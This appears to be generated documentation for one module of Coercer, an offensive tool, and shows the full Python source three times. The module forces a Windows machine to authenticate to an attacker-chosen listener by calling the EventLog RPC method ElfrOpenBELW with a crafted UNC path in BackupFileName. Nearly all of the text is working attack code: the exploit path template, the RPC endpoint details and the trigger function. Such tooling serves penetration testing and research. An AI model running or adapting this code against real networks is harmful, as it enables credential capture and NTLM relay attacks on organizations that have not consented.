coercer.methods.MS_EVEN.ElfrOpenBELW

 1#!/usr/bin/env python3
 2# -*- coding: utf-8 -*-
 3# File name          : ElfrOpenBELW.py
 4# Author             : Podalirius (@podalirius_)
 5# Date created       : 11 Dec 2022
 6
 7
 8import random
 9from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
10from coercer.network.DCERPCSessionError import DCERPCSessionError
11from impacket.dcerpc.v5 import even
12from impacket.dcerpc.v5.dtypes import NULL
13
14
15class ElfrOpenBELW(MSPROTOCOLRPCCALL):
16    """
17    Coercing a machine to authenticate using function [ElfrOpenBELW](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-even/4db1601c-7bc2-4d5c-8375-c58a6f8fc7e1) (opnum 9) of [MS-EVEN: EventLog Remoting Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-even/55b13664-f739-4e4e-bd8d-04eeda59d09f)
18
19    Method found by:
20     - [@evilashz](https://github.com/evilashz/)
21    """
22
23    exploit_paths = [
24        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\aa')
25    ]
26
27    access = {
28        "ncan_np": [
29            {
30                "namedpipe": r"\PIPE\eventlog",
31                "uuid": "82273fdc-e32a-18c3-3f78-827929dc23ea",
32                "version": "0.0"
33            }
34        ],
35        "ncacn_ip_tcp": [
36            {
37                "uuid": "82273fdc-e32a-18c3-3f78-827929dc23ea",
38                "version": "0.0"
39            }
40        ]
41    }
42
43    protocol = {
44        "longname": "[MS-EVEN]: EventLog Remoting Protocol",
45        "shortname": "MS-EVEN"
46    }
47
48    function = {
49        "name": "ElfrOpenBELW",
50        "opnum": 9,
51        "vulnerable_arguments": ["BackupFileName"]
52    }
53
54    def trigger(self, dcerpc_session, target):
55        if dcerpc_session is not None:
56            try:
57                self.path = self.path.rstrip('\x00')
58                request = even.ElfrOpenBELW()
59                request['UNCServerName'] = NULL
60                request['BackupFileName'] = self.path
61                request['MajorVersion'] = random.randint(0,100)
62                request['MinorVersion'] = random.randint(0,100)
63                resp = dcerpc_session.request(request)
64                resp.dump()
65                return ""
66            except Exception as err:
67                return err
68        else:
69            print("[!] Error: dce is None, you must call connect() first.")
70            return None
class ElfrOpenBELW(coercer.models.MSPROTOCOLRPCCALL.MSPROTOCOLRPCCALL):
16class ElfrOpenBELW(MSPROTOCOLRPCCALL):
17    """
18    Coercing a machine to authenticate using function [ElfrOpenBELW](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-even/4db1601c-7bc2-4d5c-8375-c58a6f8fc7e1) (opnum 9) of [MS-EVEN: EventLog Remoting Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-even/55b13664-f739-4e4e-bd8d-04eeda59d09f)
19
20    Method found by:
21     - [@evilashz](https://github.com/evilashz/)
22    """
23
24    exploit_paths = [
25        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\aa')
26    ]
27
28    access = {
29        "ncan_np": [
30            {
31                "namedpipe": r"\PIPE\eventlog",
32                "uuid": "82273fdc-e32a-18c3-3f78-827929dc23ea",
33                "version": "0.0"
34            }
35        ],
36        "ncacn_ip_tcp": [
37            {
38                "uuid": "82273fdc-e32a-18c3-3f78-827929dc23ea",
39                "version": "0.0"
40            }
41        ]
42    }
43
44    protocol = {
45        "longname": "[MS-EVEN]: EventLog Remoting Protocol",
46        "shortname": "MS-EVEN"
47    }
48
49    function = {
50        "name": "ElfrOpenBELW",
51        "opnum": 9,
52        "vulnerable_arguments": ["BackupFileName"]
53    }
54
55    def trigger(self, dcerpc_session, target):
56        if dcerpc_session is not None:
57            try:
58                self.path = self.path.rstrip('\x00')
59                request = even.ElfrOpenBELW()
60                request['UNCServerName'] = NULL
61                request['BackupFileName'] = self.path
62                request['MajorVersion'] = random.randint(0,100)
63                request['MinorVersion'] = random.randint(0,100)
64                resp = dcerpc_session.request(request)
65                resp.dump()
66                return ""
67            except Exception as err:
68                return err
69        else:
70            print("[!] Error: dce is None, you must call connect() first.")
71            return None

Coercing a machine to authenticate using function ElfrOpenBELW (opnum 9) of MS-EVEN: EventLog Remoting Protocol

Method found by:

exploit_paths = [('smb', '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\aa')]
access = {'ncan_np': [{'namedpipe': '\\PIPE\\eventlog', 'uuid': '82273fdc-e32a-18c3-3f78-827929dc23ea', 'version': '0.0'}], 'ncacn_ip_tcp': [{'uuid': '82273fdc-e32a-18c3-3f78-827929dc23ea', 'version': '0.0'}]}
protocol = {'longname': '[MS-EVEN]: EventLog Remoting Protocol', 'shortname': 'MS-EVEN'}
function = {'name': 'ElfrOpenBELW', 'opnum': 9, 'vulnerable_arguments': ['BackupFileName']}
def trigger(self, dcerpc_session, target):
55    def trigger(self, dcerpc_session, target):
56        if dcerpc_session is not None:
57            try:
58                self.path = self.path.rstrip('\x00')
59                request = even.ElfrOpenBELW()
60                request['UNCServerName'] = NULL
61                request['BackupFileName'] = self.path
62                request['MajorVersion'] = random.randint(0,100)
63                request['MinorVersion'] = random.randint(0,100)
64                resp = dcerpc_session.request(request)
65                resp.dump()
66                return ""
67            except Exception as err:
68                return err
69        else:
70            print("[!] Error: dce is None, you must call connect() first.")
71            return None